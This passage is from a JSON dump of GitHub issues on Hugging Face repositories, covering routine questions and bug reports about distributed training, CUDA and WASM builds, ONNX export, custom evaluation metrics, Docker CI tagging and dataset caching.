trainer.train()\r\n````\r\nI do observe that we only use 1 dataset for generating the samples even if we create two dataset object and do not wrap accelerator.is_main_process. That is because the dataset already convert by trainer for distributed training. So I think there is no point for creating dataset twice since we only use the first dataset. How to write the code such that there is no error on the second process? if I make second process dataset is None, the trainer will give error for dataset is empty\r\nDo we need to create two trainer where each trainer is corresponding to one gpu or should we only have one trainer that is in charge for two gpu? What is the best way to write the code to achieve this in this case? \r\n\r\n \r\n\n\n### Expected behavior\n\nthe correct way of implement this situation. ", "url": "https://github.com/huggingface/transformers/issues/30154", "state": "closed", "labels": [], "created_at": "2024-04-10T00:08:00Z", "updated_at": "2024-04-10T22:57:53Z", "user": "zch-cc" }, { "repo": "huggingface/accelerate", "number": 2643, "title": "How to use gather_for_metrics for object detection models?", "body": "### Reproduction\r\n\r\nI used the `gather_for_metrics` function as follows:\r\n```python\r\npredictions, ground_truths = accelerator.gather_for_metrics((predictions, ground_truths))\r\n```\r\n\r\nAnd i've got the error:\r\n```\r\naccelerate.utils.operations.DistributedOperationException: Impossible to apply the desired operation due to inadequate shapes. All shapes on the devices must be valid.\r\n```\r\n\r\n* ground_truths are dictionaries of torch.tensor with keys: `boxes`, `labels`, `image_id`, `area`, `iscrowd` following pytorch conventions: https://pytorch.org/tutorials/intermediate/torchvision_tutorial.html. \r\n\r\n* predictions are dictionaries of torch.tensor with `boxes`, `labels` and `scores` keys.\r\n\r\nI use 3 gpus, and in each I have 120 dictionaries of predictions and ground truths, but as expected inside each dictionary the tensor size should vary from 0 to n bbox predictions/ground truths.\r\nBut during gather_predictions, the `verify_operation` decorator raises an because all the tensor shapes inside the different dictionaries vary.\r\n\r\n### Expected behavior\r\n\r\nHave the possibility to gather complex objects like dictionaries of torch.tensor with different shapes!\r\n\r\nThank you for your help and for this amazing framework \ud83d\ude4f ", "url": "https://github.com/huggingface/accelerate/issues/2643", "state": "closed", "labels": [], "created_at": "2024-04-09T23:15:20Z", "updated_at": "2024-04-30T07:48:36Z", "user": "yann-rdgz" }, { "repo": "huggingface/candle", "number": 2033, "title": "How to use CUDA as the backend in `candle-wasm-examples/llama2-c` ?", "body": "How to use CUDA as the backend in `candle-wasm-examples/llama2-c` ?\r\n\r\nIn `candle-wasm-examples/llama2-c`, I do some changes shown below.\r\n\r\n```diff\r\n--- a/candle-wasm-examples/llama2-c/Cargo.toml\r\n+++ b/candle-wasm-examples/llama2-c/Cargo.toml\r\n@@ -9,7 +9,7 @@ categories.workspace = true\r\n license.workspace = true\r\n\r\n [dependencies]\r\n-candle = { workspace = true }\r\n+candle = { workspace = true, features = [\"cuda\"] }\r\n candle-nn = { workspace = true }\r\n candle-transformers = { workspace = true }\r\n num-traits = { workspace = true }\r\n\r\n```\r\n```diff\r\n--- a/candle-wasm-examples/llama2-c/src/bin/m.rs\r\n+++ b/candle-wasm-examples/llama2-c/src/bin/m.rs\r\n@@ -14,7 +14,7 @@ pub struct Model {\r\n impl Model {\r\n fn process(&mut self, tokens: &[u32]) -> candle::Result {\r\n const REPEAT_LAST_N: usize = 64;\r\n- let dev = Device::Cpu;\r\n+ let dev = Device::new_cuda(0)?;\r\n let input = Tensor::new(tokens, &dev)?.unsqueeze(0)?;\r\n let logits = self.inner.llama.forward(&input, tokens.len())?;\r\n let logits = logits.squeeze(0)?;\r\n```\r\n```diff\r\n--- a/candle-wasm-examples/llama2-c/src/worker.rs\r\n+++ b/candle-wasm-examples/llama2-c/src/worker.rs\r\n@@ -65,7 +65,7 @@ impl Model {\r\n top_p: f64,\r\n prompt: String,\r\n ) -> Result<()> {\r\n- let dev = Device::Cpu;\r\n+ let dev = Device::new_cuda(0)?;\r\n let temp = if temp <= 0. { None } else { Some(temp) };\r\n let top_p = if top_p <= 0. || top_p >= 1.0 {\r\n None\r\n@@ -248,7 +248,7 @@ impl TransformerWeights {\r\n\r\n impl Model {\r\n pub fn load(md: ModelData) -> Result {\r\n- let dev = Device::Cpu;\r\n+ let dev = Device::new_cuda(0)?;\r\n let mut model = std::io::Cursor::new(md.model);\r\n let config = Config::from_reader(&mut model)?;\r\n let weights = TransformerWeights::from_reader(&mut model, &config, &dev)?;\r\n```\r\nBut when I execute `trunk serve --release --public-url / --port 8080`, some errors occur.\r\n```shell\r\n = note: rust-lld: error: unable to find library -lcuda\r\n rust-lld: error: unable to find library -lnvrtc\r\n rust-lld: error: unable to find library -lcurand\r\n rust-lld: error: unable to find library -lcublas\r\n rust-lld: error: unable to find library -lcublasLt\r\n\r\n\r\nerror: could not compile `candle-wasm-example-llama2` (bin \"worker\") due to 1 previous error\r\n2024-04-09T16:12:09.062364Z ERROR error\r\nerror from build pipeline\r\n\r\nCaused by:\r\n 0: HTML build pipeline failed (2 errors), showing first\r\n 1: error from asset pipeline\r\n 2: running cargo build\r\n 3: error during cargo build execution\r\n 4: cargo call to executable 'cargo' with args: '[\"build\", \"--target=wasm32-unknown-unknown\", \"--manifest-path\", \"/work/training/candle/candle-wasm-examples/llama2-c/Cargo.toml\", \"--bin\", \"worker\"]' returned a bad status: exit status: 101\r\n```\r\nHow should I solve the above problem?\r\n\r\n I confirm that my CUDA installed correctly and I'm able to execute the following commands.\r\n```shell\r\ncargo new myapp\r\ncd myapp\r\ncargo add --git https://github.com/huggingface/candle.git candle-core --features \"cuda\"\r\ncargo build\r\n```\r\n", "url": "https://github.com/huggingface/candle/issues/2033", "state": "closed", "labels": [], "created_at": "2024-04-09T16:16:55Z", "updated_at": "2024-04-12T08:26:24Z", "user": "wzzju" }, { "repo": "huggingface/optimum", "number": 1804, "title": "advice for simple onnxruntime script for ORTModelForVision2Seq (or separate encoder/decoder)", "body": "I am trying to use implement this [class ](https://github.com/huggingface/optimum/blob/69af5dbab133f2e0ae892721759825d06f6cb3b7/optimum/onnxruntime/modeling_seq2seq.py#L1832) in C++ because unfortunately I didn't find any C++ implementation for this. \r\n\r\nTherefore, my current approach is to revert this class and the auxiliary classes to a simple onnxruntime prediction, to make things easier to port to C++. \r\n\r\nDoes anyone have any advice in this matter? Thank you\r\n", "url": "https://github.com/huggingface/optimum/issues/1804", "state": "open", "labels": [ "question", "onnxruntime" ], "created_at": "2024-04-09T15:14:40Z", "updated_at": "2024-10-14T12:41:15Z", "user": "eduardatmadenn" }, { "repo": "huggingface/chat-ui", "number": 997, "title": "Community Assistants", "body": "Hi, I've looked through all the possible issues but I didn't find what I was looking for. \r\n\r\nOn self-hosted is the option to have the community assistants such as the ones on https://huggingface.co/chat/ not available? I've also noticed that when I create Assistants on my side they do not show up on community tabs either they are purely user restricted, I am missing something? I've configured the hf token and the API base, any hints are appreciated.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/165610201/f10307a3-17c4-4e0c-9036-1f63237e2f72)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/997", "state": "closed", "labels": [ "help wanted", "assistants" ], "created_at": "2024-04-09T12:44:49Z", "updated_at": "2024-04-23T06:09:47Z", "comments": 2, "user": "Coinficient" }, { "repo": "huggingface/evaluate", "number": 570, "title": "[Question] How to have no preset values sent into `.compute()` ", "body": "We've a use-case https://huggingface.co/spaces/alvations/llm_harness_mistral_arc/blob/main/llm_harness_mistral_arc.py\r\n\r\nwhere default feature input types for `evaluate.Metric` is nothing and we get something like this in our `llm_harness_mistral_arc/llm_harness_mistral_arc.py`\r\n\r\n```python\r\nimport evaluate\r\nimport datasets\r\nimport lm_eval\r\n\r\n\r\n@evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION)\r\nclass llm_harness_mistral_arc(evaluate.Metric):\r\n def _info(self):\r\n # TODO: Specifies the evaluate.EvaluationModuleInfo object\r\n return evaluate.MetricInfo(\r\n # This is the description that will appear on the modules page.\r\n module_type=\"metric\",\r\n description=\"\",\r\n citation=\"\",\r\n inputs_description=\"\",\r\n # This defines the format of each prediction and reference\r\n features={},\r\n )\r\n\r\n def _compute(self, pretrained=None, tasks=[]):\r\n outputs = lm_eval.simple_evaluate( \r\n model=\"hf\",\r\n model_args={\"pretrained\":pretrained},\r\n tasks=tasks,\r\n num_fewshot=0,\r\n )\r\n results = {}\r\n for task in outputs['results']:\r\n results[task] = {'acc':outputs['results'][task]['acc,none'], \r\n 'acc_norm':outputs['results'][task]['acc_norm,none']}\r\n return results\r\n```\r\n\r\nAnd in our expected user-behavior is something like, [in]:\r\n\r\n```python\r\nimport evaluate\r\n\r\nmodule = evaluate.load(\"alvations/llm_harness_mistral_arc\")\r\nmodule.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\", tasks=[\"arc_easy\"])\r\n```\r\n\r\nAnd the expected output as per our `tests.py`, https://huggingface.co/spaces/alvations/llm_harness_mistral_arc/blob/main/tests.py [out]:\r\n\r\n```\r\n{'arc_easy': {'acc': 0.8131313131313131, 'acc_norm': 0.7680976430976431}}\r\n```\r\n\r\nBut the `evaluate.Metric.compute()` somehow expects a default batch and `module.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\", tasks=[\"arc_easy\"])` throws an error:\r\n\r\n```python\r\n---------------------------------------------------------------------------\r\nValueError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n----> 1 module.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\",\r\n 2 tasks=[\"arc_easy\"])\r\n\r\n2 frames\r\n[/usr/local/lib/python3.10/dist-packages/evaluate/module.py](https://localhost:8080/#) in _get_all_cache_files(self)\r\n 309 if self.num_process == 1:\r\n 310 if self.cache_file_name is None:\r\n--> 311 raise ValueError(\r\n 312 \"Evaluation module cache file doesn't exist. Please make sure that you call `add` or `add_batch` \"\r\n 313 \"at least once before calling `compute`.\"\r\n\r\nValueError: Evaluation module cache file doesn't exist. Please make sure that you call `add` or `add_batch` at least once before calling `compute`.\r\n```\r\n\r\n\r\n#### Q: Is it possible for the `.compute()` to expect no features? \r\n\r\n\r\nI've also tried this but somehow the `evaluate.Metric.compute` is still looking for some sort of `predictions` variable.\r\n\r\n```\r\n@evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION)\r\nclass llm_harness_mistral_arc(evaluate.Metric):\r\n def _info(self):\r\n # TODO: Specifies the evaluate.EvaluationModuleInfo object\r\n return evaluate.MetricInfo(\r\n # This is the description that will appear on the modules page.\r\n module_type=\"metric\",\r\n description=\"\",\r\n citation=\"\",\r\n inputs_description=\"\",\r\n # This defines the format of each prediction and reference\r\n features=[\r\n datasets.Features(\r\n {\r\n \"pretrained\": datasets.Value(\"string\", id=\"sequence\"),\r\n \"tasks\": datasets.Sequence(datasets.Value(\"string\", id=\"sequence\"), id=\"tasks\"),\r\n }\r\n )]\r\n )\r\n\r\n def _compute(self, pretrained, tasks):\r\n outputs = lm_eval.simple_evaluate( \r\n model=\"hf\",\r\n model_args={\"pretrained\":pretrained},\r\n tasks=tasks,\r\n num_fewshot=0,\r\n )\r\n results = {}\r\n for task in outputs['results']:\r\n results[task] = {'acc':outputs['results'][task]['acc,none'], \r\n 'acc_norm':outputs['results'][task]['acc_norm,none']}\r\n return results\r\n````\r\n\r\nthen:\r\n\r\n```python\r\nimport evaluate\r\n\r\nmodule = evaluate.load(\"alvations/llm_harness_mistral_arc\")\r\nmodule.compute(pretrained=\"mistralai/Mistral-7B-Instruct-v0.2\", tasks=[\"arc_easy\"])\r\n```\r\n\r\n[out]:\r\n\r\n```\r\n---------------------------------------------------------------------------\r\nKeyError Traceback (most recent call last)\r\n[\r\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\noptimum-cli export onnx --model Qwen/Qwen-7B qwen_optimum_onnx/ --trust-remote-code\n\n### Expected behavior\n\nI would expect Optimum to successfully export the Qwen model to ONNX format without encountering any errors or issues.", "url": "https://github.com/huggingface/optimum/issues/1798", "state": "open", "labels": [ "bug" ], "created_at": "2024-04-08T11:36:09Z", "updated_at": "2024-04-08T11:36:09Z", "comments": 0, "user": "Harini-Vemula-2382" }, { "repo": "huggingface/chat-ui", "number": 986, "title": "Github actions won't push built docker images on releases", "body": "We currently have a [github actions workflow](https://github.com/huggingface/chat-ui/blob/main/.github/workflows/build-image.yml) that builds an image on every push to `main` and tags it with `latest` and the commit id. [(see here)](https://github.com/huggingface/chat-ui/pkgs/container/chat-ui/versions)\r\n\r\nThe workflow should also push images tagged for each releases, for example `v0.8` but the workflow [fails](https://github.com/huggingface/chat-ui/actions/runs/8536772524) with a `buildx failed with: ERROR: tag is needed when pushing to registry` error. \r\n\r\nI think it would be really nice to have support for tagged images for each releases, but I'm not the best with github actions so if someone has some time and would like to look at it, that would be super appreciated \ud83e\udd17 ", "url": "https://github.com/huggingface/chat-ui/issues/986", "state": "closed", "labels": [ "help wanted", "CI/CD" ], "created_at": "2024-04-08T07:51:13Z", "updated_at": "2024-04-08T11:27:42Z", "comments": 2, "user": "nsarrazin" }, { "repo": "huggingface/candle", "number": 2025, "title": "How to specify which graphics card to run a task on in a server with multiple graphics cards?", "body": "", "url": "https://github.com/huggingface/candle/issues/2025", "state": "closed", "labels": [], "created_at": "2024-04-07T10:48:35Z", "updated_at": "2024-04-07T11:05:52Z", "user": "lijingrs" }, { "repo": "huggingface/text-embeddings-inference", "number": 229, "title": "Question: How to add a prefix to the underlying server", "body": "I've managed to run the text embeddings inference perfectly using the already built docker images and I'm trying to allow it to our internal components\r\n\r\nRight now they're sharing the following behavior\r\n\r\nMyhost.com/modelname/v1/embeddings\r\n\r\nI was wondering if this \"model name\" is possible to add as a prefix inside the application through some configuration.\r\n\r\nHow could I do that?", "url": "https://github.com/huggingface/text-embeddings-inference/issues/229", "state": "closed", "labels": [], "created_at": "2024-04-06T17:29:59Z", "updated_at": "2024-04-08T09:14:40Z", "user": "Ryojikn" }, { "repo": "huggingface/transformers.js", "number": 685, "title": "Transformers.js seems to need an internet connection when it shouldn't? (Error: no available backend found.)", "body": "### Question\n\nWhat is the recommended way to get Transformers.js to work even when, later on, there is no internet connection?\r\n\r\nIs it using a service worker? Or are there other (perhaps hidden) settings for managing caching of files?\r\n\r\nI'm assuming here that the `Error: no available backend found` error message is related to Transformers.js not being able to find files once Wi-Fi has been turned off. I was a bit surprised by that, since I do see a cache called `transformers-cache` being created. Is that not caching all the required files?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/685", "state": "open", "labels": [ "question" ], "created_at": "2024-04-06T12:40:15Z", "updated_at": "2024-09-03T01:22:15Z", "user": "flatsiedatsie" }, { "repo": "huggingface/trl", "number": 1510, "title": "[question] how to apply model parallism to solve cuda memory error", "body": "hi team. I am using the SFT and PPO code to train my model, link https://github.com/huggingface/trl/tree/main/examples/scripts. \r\n\r\nDue to long context length and 7B-level model size, I am facing cuda memory issue on my single gpu.\r\n\r\nIs there any straightforward manner to utilize multiple gpus on my server to train the model thru SFT and PPO script ?\r\nsuch as spliting the model to multiple gpus as model parallism. Is there any argument parameters I can directly pass into my training script ?\r\nThanks a lot.\r\n```\r\nexport CUDA_VISIBLE_DEVICES='7'; python examples/scripts/sft_travel.py \\\r\n --model_name_or_path=\"mistralai/Mistral-7B-Instruct-v0.2\" \\\r\n --report_to=\"wandb\" \\\r\n --learning_rate=5e-5 \\\r\n --per_device_train_batch_size=4 \\\r\n --gradient_accumulation_steps=16 \\\r\n --logging_steps=1 \\\r\n --num_train_epochs=120 \\\r\n --lr_scheduler_type \"constant\" \\\r\n --max_steps=-1 \\\r\n --gradient_checkpointing \\\r\n --max_seq_length 16000 \\\r\n --output_dir \"8bit\" \\\r\n --overwrite_output_dir True \\\r\n --logging_strategy \"epoch\" \\\r\n --evaluation_strategy \"no\"\r\n```", "url": "https://github.com/huggingface/trl/issues/1510", "state": "closed", "labels": [], "created_at": "2024-04-06T02:09:36Z", "updated_at": "2024-05-06T17:02:35Z", "user": "yanan1116" }, { "repo": "huggingface/dataset-viewer", "number": 2667, "title": "Rename datasets-server to dataset-viewer in infra internals?", "body": "Follow-up to #2650.\r\n\r\nIs it necessary? Not urgent in any Case.\r\n\r\nSome elements to review:\r\n- [ ] https://github.com/huggingface/infra\r\n- [ ] https://github.com/huggingface/infra-deployments\r\n- [ ] docker image tags (https://hub.docker.com/r/huggingface/datasets-server-services-search -> https://hub.docker.com/r/huggingface/dataset-viewer-services-search)\r\n- [ ] Helm chart name\r\n- [ ] AWS parameters\r\n- [ ] kubernetes namespaces\r\n- [ ] Hub app names and tokens\r\n- [ ] https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/datasets-server\r\n- [ ] buckets: hf-datasets-server-statics-test, hf-datasets-server-statics\r\n- [ ] MongoDB databases\r\n- [ ] BetterUptime\r\n- [ ] shared directories (PARQUET_METADATA_CACHE_APPNAME)\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2667", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-04-05T16:53:34Z", "updated_at": "2024-04-08T09:26:14Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2666, "title": "Change API URL to dataset-viewer.huggingface.co?", "body": "Follow-up to https://github.com/huggingface/dataset-viewer/issues/2650\r\n\r\nShould we do it?\r\n- https://github.com/huggingface/dataset-viewer/issues/2650#issuecomment-2040217875\r\n- https://github.com/huggingface/moon-landing/pull/9520#issuecomment-2040220911\r\n\r\nIf we change it, we would have to update:\r\n- moon-landing\r\n- datasets\r\n- the docs (hub, datasets, dataset-viewer)\r\n- other written support (blog, observable, notion...)\r\n\r\nIf so, also change the dev URL: https://datasets-server.us.dev.moon.huggingface.tech.\r\n\r\nWe should also handle the redirection from the old URL to the new one.", "url": "https://github.com/huggingface/dataset-viewer/issues/2666", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-04-05T16:49:13Z", "updated_at": "2024-04-08T09:24:43Z", "user": "severo" }, { "repo": "huggingface/huggingface.js", "number": 609, "title": "[Question] What is the correct way to access commit diff results via http?", "body": "Data I am interested in:\r\n![image](https://github.com/huggingface/huggingface.js/assets/16808224/cada880a-bc46-496b-869b-02adb083b6a7)\r\nHere's the endpoint to list commits\r\nhttps://huggingface.co/api/models/SimonMA/Codellama-7b-lora-rps-adapter/commits/main", "url": "https://github.com/huggingface/huggingface.js/issues/609", "state": "closed", "labels": [], "created_at": "2024-04-05T12:00:15Z", "updated_at": "2024-04-09T18:40:05Z", "user": "madgetr" }, { "repo": "huggingface/dataset-viewer", "number": 2661, "title": "Increase the number of backfill workers?", "body": "Today, it's 8. Let's try increasing it and see if it speeds up the backfill job.\r\n\r\nThe current throughput is 577 datasets/minute.", "url": "https://github.com/huggingface/dataset-viewer/issues/2661", "state": "open", "labels": [ "question", "P2", "prod" ], "created_at": "2024-04-05T10:42:11Z", "updated_at": "2024-04-05T16:42:13Z", "user": "severo" }, { "repo": "huggingface/transformers", "number": 30066, "title": "How to calculate the mAP on this network?", "body": "### System Info\r\n\r\nI want to evaluate my network with the mean Average Precision. I don't know how to get the class-id of my gt data. Are there any examples to calculate the mAP with this library?\r\n\r\nI use the DetrForObjectDetection with my own dataset.\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nthis is my code to save the loss in a csv file. I also want to save the mAP in this file.\r\n\r\n def on_train_epoch_end(self, trainer, pl_module):\r\n train_loss = trainer.callback_metrics.get(\"training_loss\").item()\r\n val_loss = trainer.callback_metrics.get(\"validation/loss\").item()\r\n with open(self.file_path, 'a', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n if not self.header_written:\r\n writer.writerow([\"Epoch\", \"Train Loss\", \"Validation Loss\"])\r\n self.header_written = True\r\n writer.writerow([pl_module.current_epoch, train_loss, val_loss])\r\n\r\n### Expected behavior\r\n\r\nI tried to get the data with this code:\r\n\r\n gt_boxes = []\r\n detected_boxes = []\r\n for batch in self.val_dataloader:\r\n pixel_values = batch['pixel_values'].to(pl_module.device)\r\n pixel_mask = batch['pixel_mask'].to(pl_module.device)\r\n labels = batch['labels']\r\n # train_idx = batch['train_idx']\r\n outputs = pl_module(pixel_values=pixel_values, pixel_mask=pixel_mask)\r\n \r\n target_sizes = torch.tensor([image.shape[-2:] for image in pixel_values]).to(pixel_values.device)\r\n detections = image_processor.post_process_object_detection(outputs, target_sizes=target_sizes, threshold=0.5)[0]\r\n\r\n for i in range(len(detections['scores'])):\r\n prob_score = detections['scores'][i].item()\r\n class_pred = detections['labels'][i].item()\r\n box = detections['boxes'][i].detach().cpu().numpy()\r\n \r\n detected_boxes.append([class_pred, prob_score, *box])\r\n \r\n for label in labels:\r\n gt_box = label['boxes']\r\n for box in gt_box:\r\n gt_boxes.append(box)\r\n \r\n image_height = 2048\r\n image_width = 2048\r\n\r\n gt_boxes_abs = []\r\n for box in gt_boxes:\r\n x_min, y_min, width, height = box\r\n x_max = x_min + width\r\n y_max = y_min + height\r\n x_min_abs = int(x_min * image_width)\r\n y_min_abs = int(y_min * image_height)\r\n x_max_abs = int(x_max * image_width)\r\n y_max_abs = int(y_max * image_height)\r\n \r\n class_id = ???\r\n difficult = ???\r\n crowd = ???\r\n \r\n gt_boxes_abs.append([x_min_abs, y_min_abs, x_max_abs, y_max_abs, class_id, difficult, crowd])\r\n \r\n adjusted_detected_boxes = []\r\n converted_boxes = []\r\n for box in detected_boxes:\r\n class_id = box[0]\r\n confidence = box[1]\r\n x_min = box[2]\r\n y_min = box[3]\r\n x_max = box[4]\r\n y_max = box[5]\r\n converted_boxes.append([x_min, y_min, x_max, y_max, class_id, confidence])", "url": "https://github.com/huggingface/transformers/issues/30066", "state": "closed", "labels": [], "created_at": "2024-04-05T08:32:31Z", "updated_at": "2024-06-08T08:04:08Z", "user": "Sebi2106" }, { "repo": "huggingface/optimum-quanto", "number": 152, "title": "How does quanto calibrate torch functions?", "body": "I have learned quanto calibrate ops in module forms by adding module hooks, but how about torch functions like `torch.sigmoid`, `torch.elu`, and `torch.log` etc?\r\nI think the output scale of `torch.sigmoid` could be directly evaluated similarly to quanto's approach with `softmax`. Additionally, `torch.elu` might be substituted with `torch.nn.ELU`.\r\nHowever, I'm uncertain how functions like `torch.log`, which are unbounded and lack explicit module forms will be calibrated within quanto.", "url": "https://github.com/huggingface/optimum-quanto/issues/152", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-05T06:49:51Z", "updated_at": "2024-04-11T09:41:55Z", "user": "shuokay" }, { "repo": "huggingface/candle", "number": 2007, "title": "How to run inference of a (very) large model across mulitple GPUs ?", "body": "It is mentioned on README that candle supports multi GPU inference, using NCCL under the hood. How can this be implemented ? I wonder if there is any available example to look at..\r\n\r\nAlso, I know PyTorch has things like DDP and FSDP, is candle support for multi GPU inference comparable to these techniques ? ", "url": "https://github.com/huggingface/candle/issues/2007", "state": "open", "labels": [], "created_at": "2024-04-04T13:52:46Z", "updated_at": "2024-08-12T04:53:54Z", "user": "jorgeantonio21" }, { "repo": "huggingface/candle", "number": 2006, "title": "How to get different outputs for the same prompt?", "body": "I used a gemma, it always returned same outputs for same prompt.\r\nHow can I get different outputs? Is there any method or parameter for sampling? (I even doubt that `top_p` works.)\r\n", "url": "https://github.com/huggingface/candle/issues/2006", "state": "closed", "labels": [], "created_at": "2024-04-04T10:43:31Z", "updated_at": "2024-04-13T11:17:36Z", "user": "Hojun-Son" }, { "repo": "huggingface/chat-ui", "number": 975, "title": "is it possible to hide the setting from the users? most users do not want to create assistants, and they just want to use existing ones. ", "body": "In the left-hand corner of hugginchat, \"Assistants\" and \"Settings\" are visible. We are considering whether it is possible to hide these options from our users, as they have expressed no interest in creating assistants and prefer to use existing ones. Many thanks for your kind help.. Howard", "url": "https://github.com/huggingface/chat-ui/issues/975", "state": "open", "labels": [], "created_at": "2024-04-04T07:33:25Z", "updated_at": "2024-04-04T07:33:25Z", "comments": 0, "user": "hjchenntnu" }, { "repo": "huggingface/transformers.js", "number": 679, "title": "Speech Recognition/Whisper word level scores or confidence output", "body": "### Question\n\nHey,\r\nBig thanks for awesome project!\r\n\r\nIt possible to add score/confidence for word level output when using Speech Recognition/Whisper model?\r\nWould appreciate any direction/comments or suggestion where to dig to add it. \r\nHappy to submit PR if I will success in it.\r\n\r\nThanks!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/679", "state": "open", "labels": [ "question" ], "created_at": "2024-04-04T07:04:00Z", "updated_at": "2024-04-04T07:04:00Z", "user": "wobbble" }, { "repo": "huggingface/transformers", "number": 30034, "title": "What is the data file format of `run_ner.py`?", "body": "### Feature request\r\n\r\nWhat is the correct format for custom dataset in run_ner.py? Would it be possible to include a few lines on this with a helpful example? \r\n\r\n### Motivation\r\n\r\nI am using the example script run_ner.py from [huggingface](https://github.com/huggingface)/transformers It is not possible to use standard conll format for the model fine-tuning of run_ner.\r\n\r\n### Your contribution\r\n\r\nWe could include this in the corresponding readme.", "url": "https://github.com/huggingface/transformers/issues/30034", "state": "closed", "labels": [ "Good First Issue" ], "created_at": "2024-04-04T06:36:30Z", "updated_at": "2024-04-08T11:50:00Z", "user": "sahil3773mehta" }, { "repo": "huggingface/datasets", "number": 6777, "title": ".Jsonl metadata not detected", "body": "### Describe the bug\n\nHi I have the following directory structure:\r\n|--dataset\r\n| |-- images\r\n| |-- metadata1000.csv\r\n| |-- metadata1000.jsonl\r\n| |-- padded_images\r\n\r\nExample of metadata1000.jsonl file\r\n{\"caption\": \"a drawing depicts a full shot of a black t-shirt with a triangular pattern on the front there is a white label on the left side of the triangle\", \"image\": \"images/212734.png\", \"gaussian_padded_image\": \"padded_images/p_212734.png\"}\r\n{\"caption\": \"an eye-level full shot of a large elephant and a baby elephant standing in a watering hole on the left side is a small elephant with its head turned to the right of dry land, trees, and bushes\", \"image\": \"images/212735.png\", \"gaussian_padded_image\": \"padded_images/p_212735.png\"}\r\n.\r\n.\r\n.\r\n\r\nI'm trying to use dataset = load_dataset(\"imagefolder\", data_dir='/dataset/', split='train') to load the the dataset, however it is not able to load according to the fields in the metadata1000.jsonl .\r\nplease assist to load the data properly\r\n\r\nalso getting \r\n\r\n```\r\n File \"/workspace/train_trans_vae.py\", line 1089, in \r\n print(get_metadata_patterns('/dataset/'))\r\n File \"/opt/conda/lib/python3.10/site-packages/datasets/data_files.py\", line 499, in get_metadata_patterns\r\n raise FileNotFoundError(f\"The directory at {base_path} doesn't contain any metadata file\") from None\r\nFileNotFoundError: The directory at /dataset/ doesn't contain any metadata file\r\n```\r\n\r\nwhen trying \r\n\r\n```\r\n from datasets.data_files import get_metadata_patterns\r\n print(get_metadata_patterns('/dataset/'))\r\n```\r\n\r\n\r\n\n\n### Steps to reproduce the bug\n\ndataset Version: 2.18.0\r\nmake a similar jsonl and similar directory format\n\n### Expected behavior\n\ncreates a dataset object with the column names, caption,image,gaussian_padded_image\n\n### Environment info\n\ndataset Version: 2.18.0", "url": "https://github.com/huggingface/datasets/issues/6777", "state": "open", "labels": [], "created_at": "2024-04-04T06:31:53Z", "updated_at": "2024-04-05T21:14:48Z", "comments": 5, "user": "nighting0le01" }, { "repo": "huggingface/lighteval", "number": 143, "title": "Do an intro notebook on how to use `lighteval`", "body": "", "url": "https://github.com/huggingface/lighteval/issues/143", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-04-03T07:53:25Z", "updated_at": "2024-12-05T10:18:42Z", "user": "clefourrier" }, { "repo": "huggingface/accelerate", "number": 2614, "title": "How to I selectively apply accelerate to trainers", "body": "I have two trainers in a script, one is SFTTrainer and one is PPOTrainer, both from trl library. Is it possible to only apply accelerate to PPOTrainer?", "url": "https://github.com/huggingface/accelerate/issues/2614", "state": "closed", "labels": [], "created_at": "2024-04-03T06:39:05Z", "updated_at": "2024-05-21T15:06:36Z", "user": "zyzhang1130" }, { "repo": "huggingface/sentence-transformers", "number": 2568, "title": "How to improve sentence-transformers' performance on CPU?", "body": "On the CPU, I tried huggingface\u2018s optimization.onnx and sentence_transformers and I found that on the task of feature_extraction, optimization.onnx was not as good as sentence_transformers in batch encoding performance.\r\nMy question is, are sentence_transformers the current ceiling on CPU performance?", "url": "https://github.com/huggingface/sentence-transformers/issues/2568", "state": "closed", "labels": [], "created_at": "2024-04-03T02:09:14Z", "updated_at": "2024-04-23T09:17:39Z", "user": "chensuo2048" }, { "repo": "huggingface/datasets", "number": 6773, "title": "Dataset on Hub re-downloads every time?", "body": "### Describe the bug\r\n\r\nHi, I have a dataset on the hub [here](https://huggingface.co/datasets/manestay/borderlines). It has 1k+ downloads, which I sure is mostly just me and my colleagues working with it. It should have far fewer, since I'm using the same machine with a properly set up HF_HOME variable. However, whenever I run the below function `load_borderlines_hf`, it downloads the entire dataset from the hub and then does the other logic:\r\nhttps://github.com/manestay/borderlines/blob/4e161f444661e2ebfe643f3fe149d9258d63a57d/run_gpt/lib.py#L80\r\n\r\nLet me know what I'm doing wrong here, or if it's a bug with the `datasets` library itself. On the hub I have my data stored in CSVs, but several columns are lists, so that's why I have the code to map splitting on `;`. I looked into dataset loading scripts, but it seemed difficult to set up. I have verified that other `datasets` and `models` on my system are using the cache properly (e.g. I have a 13B parameter model and large datasets, but those are cached and don't redownload).\r\n\r\n__EDIT: __ as pointed out in the discussion below, it may be the `map()` calls that aren't being cached properly. Supposing the `load_dataset()` retrieve from the cache, then it should be the case that the `map()` calls also retrieve from the cached output. But the `map()` commands re-execute sometimes.\r\n\r\n### Steps to reproduce the bug\r\n\r\n1. Copy and paste the function from 